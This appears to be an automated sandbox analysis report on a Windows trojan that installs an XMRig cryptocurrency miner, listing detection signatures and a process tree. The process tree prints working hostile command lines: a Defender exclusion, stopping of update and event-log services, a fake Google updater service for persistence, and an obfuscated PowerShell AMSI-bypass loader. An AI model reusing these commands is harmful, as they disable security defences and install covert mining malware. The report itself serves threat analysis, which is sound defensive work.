Windows Analysis Report
egFMhHSlmf.exe

Overview

General Information

Sample name: egFMhHSlmf.exe (renamed because the original name is a hash value)
Original sample name: 1417d38c40d85d1c4eb7fad3444ca069.exe
Analysis ID: 1530444
MD5: 1417d38c40d85d1c4eb7fad3444ca069
SHA1: 27d8e2ca9537c80d1c1148830f9a6499f1e3e797
SHA256: 5f7c6cdea3c4e825af1d796cbd34b2d45b2b6fabed130e717a30a6d871993f5d
Tags: 64, exe, trojan

Detection

Xmrig
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Process Tree

  • System is w10x64
  • egFMhHSlmf.exe (PID: 1764 cmdline: "C:\Users\user\Desktop\egFMhHSlmf.exe" MD5: 1417D38C40D85D1C4EB7FAD3444CA069)
    • powershell.exe (PID: 7056 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5128 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 948 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 4568 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4876 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5692 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2144 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7008 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2676 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6104 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7080 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2032 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 3084 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • sc.exe (PID: 5360 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3540 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5704 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4856 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3768 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+
[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMwf=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+'cA'+'d'+'d'+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PKjZFAJMrKtEHtCAQET=OkULRfyuHQtJ @([String])([IntPtr]);$TwfHJfbEiJESflVXJDRdie=OkULRfyuHQtJ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VJhcAYUztep=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'od'+[Char](117)+''+[Char](108)+''+'e'+'H'+[Char](97)+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+'.'+[Char](100)+'l'+[Char](108)+'')));$pGTzdTbPDPtdSw=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$VJhcAYUztep,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$gmmiBVEmviKAGYOfq=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$VJhcAYUztep,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$RgMdvyV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pGTzdTbPDPtdSw,$PKjZFAJMrKtEHtCAQET).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$RRZbMqrVsxPNJwFWd=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$RgMdvyV,[Object]('Am'+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$InrlgaQyOp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmmiBVEmviKAGYOfq,$TwfHJfbEiJESflVXJDRdie).Invoke($RRZbMqrVsxPNJwFWd,[uint32]8,4,[ref]$InrlgaQyOp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RRZbMqrVsxPNJwFWd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmmiBVEmviKAGYOfq,$TwfHJfbEiJESflVXJDRdie).Invoke($RRZbMqrVsxPNJwFWd,[uint32]8,0x20,[ref]$InrlgaQyOp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+'er'+'s'+'ta'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 3820 cmdline: C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • dllhost.exe (PID: 7080 cmdline: C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • updater.exe (PID: 5712 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: 1417D38C40D85D1C4EB7FAD3444CA069)
    • powershell.exe (PID: 7068 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3268 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1944 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 2676 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4364 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6904 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5704 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4980 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1948 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6600 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3816 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5372 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 5952 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 6900 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 2248 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • powershell.exe (PID: 2120 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''
+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$JRxrSkXtFvoHQj=$opuJgspdjbNOB.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BKEqIqCwRefEvWHkEvb=tvJmJWkkljdL @([String])([IntPtr]);$jHKuyMaewNXWYnPAXNtVwb=tvJmJWkkljdL 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TPsVJhpipYG=$opuJgspdjbNOB.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+'o'+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$rnQeYQPaljIZIy=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$TPsVJhpipYG,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'Li'+[Char](98)+'r'+'a'+''+'r'+''+'y'+''+[Char](65)+'')));$baDhPfYjDHPSnZPKw=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$TPsVJhpipYG,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+'ua'+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$dImCJWh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rnQeYQPaljIZIy,$BKEqIqCwRefEvWHkEvb).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$VaoZSrEKYRrKpAGDt=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$dImCJWh,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$HGMKYUxWWR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($baDhPfYjDHPSnZPKw,$jHKuyMaewNXWYnPAXNtVwb).Invoke($VaoZSrEKYRrKpAGDt,[uint32]8,4,[ref]$HGMKYUxWWR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VaoZSrEKYRrKpAGDt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($baDhPfYjDHPSnZPKw,$jHKuyMaewNXWYnPAXNtVwb).Invoke($VaoZSrEKYRrKpAGDt,[uint32]8,0x20,[ref]$HGMKYUxWWR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'TW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 
04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000042.00000002.3447887034.0000028A981B7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
